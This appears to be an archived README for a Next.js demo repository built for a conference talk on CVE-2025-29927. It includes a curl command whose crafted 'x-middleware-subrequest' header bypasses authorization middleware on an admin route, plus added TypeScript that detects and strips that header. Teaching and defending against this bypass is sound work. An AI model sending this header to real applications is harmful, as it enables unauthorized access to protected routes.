Related vulnerability
Description
A demo of the CVE-2025-29927 vulnerability for a NebraskaJS lightning talk
Introduction
This is a [Next.js](https://nextjs.org) project bootstrapped with [`create-next-app`](https://nextjs.org/docs/app/api-reference/cli/create-next-app).
## Testing the vulnerability
First, you can confirm that the middleware works and should redirect the user:
```bash
curl http://localhost:3000/api/admin
```
Then, you can show how the middleware is being bypassed with the following command:
```bash
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/api/admin
```
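A defender-side companion to the two commands above, added here as an example that is not part of this repository: it counts how many colon-separated entries of the `x-middleware-subrequest` header name the middleware (five in the demo command), turns that into an alert line, and strips the header the way a reverse proxy in front of Next.js should when an upgrade has to wait. The header map type, the default middleware path and the sample request headers are constructed for the example.

```typescript
// Added example, not part of this repository: detect and strip the header the
// demo above uses to bypass middleware. A plain header map (constructed, as a
// reverse proxy or access-log layer would hand it over) stands in for a request.
type HeaderMap = Record<string, string>;

const SUBREQUEST_HEADER = "x-middleware-subrequest";

// Header names are case-insensitive, so match them in lower case.
function findHeader(headers: HeaderMap, name: string): string | undefined {
  for (const key of Object.keys(headers)) {
    if (key.toLowerCase() === name) return headers[key];
  }
  return undefined;
}

// Counts how many ':'-separated entries name the middleware (5 in the demo curl);
// -1 means the header is absent. Any external request carrying it is suspect.
function subrequestRepeats(headers: HeaderMap, middlewarePath = "src/middleware"): number {
  const value = findHeader(headers, SUBREQUEST_HEADER);
  if (value === undefined) return -1;
  return value.split(":").filter((part) => part === middlewarePath).length;
}

// Detection: one alert line for a request, or null when nothing is suspicious.
function alertFor(path: string, headers: HeaderMap): string | null {
  const repeats = subrequestRepeats(headers);
  if (repeats < 0) return null;
  return `${path}: external ${SUBREQUEST_HEADER} header, middleware named ${repeats}x`;
}

// Mitigation while an upgrade is pending: drop the header at the edge so an
// external client's copy never reaches the Next.js app.
function stripSubrequestHeader(headers: HeaderMap): HeaderMap {
  const clean: HeaderMap = {};
  for (const key of Object.keys(headers)) {
    if (key.toLowerCase() !== SUBREQUEST_HEADER) clean[key] = headers[key];
  }
  return clean;
}

// Constructed sample mirroring the second curl command above; not real log data.
const DEMO_BYPASS_HEADERS: HeaderMap = {
  host: "localhost:3000",
  "X-Middleware-Subrequest":
    "src/middleware:src/middleware:src/middleware:src/middleware:src/middleware",
};

console.log(alertFor("/api/admin", { host: "localhost:3000" })); // null
console.log(alertFor("/api/admin", DEMO_BYPASS_HEADERS));
console.log(Object.keys(stripSubrequestHeader(DEMO_BYPASS_HEADERS))); // [ 'host' ]
```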
## Getting Started
First, run the development server:
```bash
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
```
Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.
You can start editing the page by modifying `app/page.tsx`. The page auto-updates as you edit the file.
This project uses [`next/font`](https://nextjs.org/docs/app/building-your-application/optimizing/fonts) to automatically optimize and load [Geist](https://vercel.com/font), a new font family for Vercel.
## Learn More
To learn more about Next.js, take a look at the following resources:
- [Next.js Documentation](https://nextjs.org/docs) - learn about Next.js features and API.
- [Learn Next.js](https://nextjs.org/learn) - an interactive Next.js tutorial.
You can check out [the Next.js GitHub repository](https://github.com/vercel/next.js) - your feedback and contributions are welcome!
## Deploy on Vercel
The easiest way to deploy your Next.js app is to use the [Vercel Platform](https://vercel.com/new?utm_medium=default-template&filter=next.js&utm_source=create-next-app&utm_campaign=create-next-app-readme) from the creators of Next.js.
Check out our [Next.js deployment documentation](https://nextjs.org/docs/app/building-your-application/deploying) for more details.
File snapshot
```text
[4.0K] /data/pocs/4e8e3c745b0d0eb76ed0a7fe57e68b7a611f8aed
├── [ 133] next.config.ts
├── [ 482] package.json
├── [ 46K] package-lock.json
├── [ 81] postcss.config.mjs
├── [4.0K] public
│ ├── [ 391] file.svg
│ ├── [1.0K] globe.svg
│ ├── [1.3K] next.svg
│ ├── [ 128] vercel.svg
│ └── [ 385] window.svg
├── [1.8K] README.md
├── [4.0K] src
│ ├── [4.0K] app
│ │ ├── [4.0K] api
│ │ │ └── [4.0K] admin
│ │ │ └── [ 139] route.ts
│ │ ├── [ 25K] favicon.ico
│ │ ├── [ 488] globals.css
│ │ ├── [ 689] layout.tsx
│ │ └── [4.0K] page.tsx
│ └── [ 216] middleware.ts
└── [ 602] tsconfig.json
5 directories, 17 files
```
Notes
1. Accessing the original source is recommended.
2. If the source has gone offline or cannot be reached, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.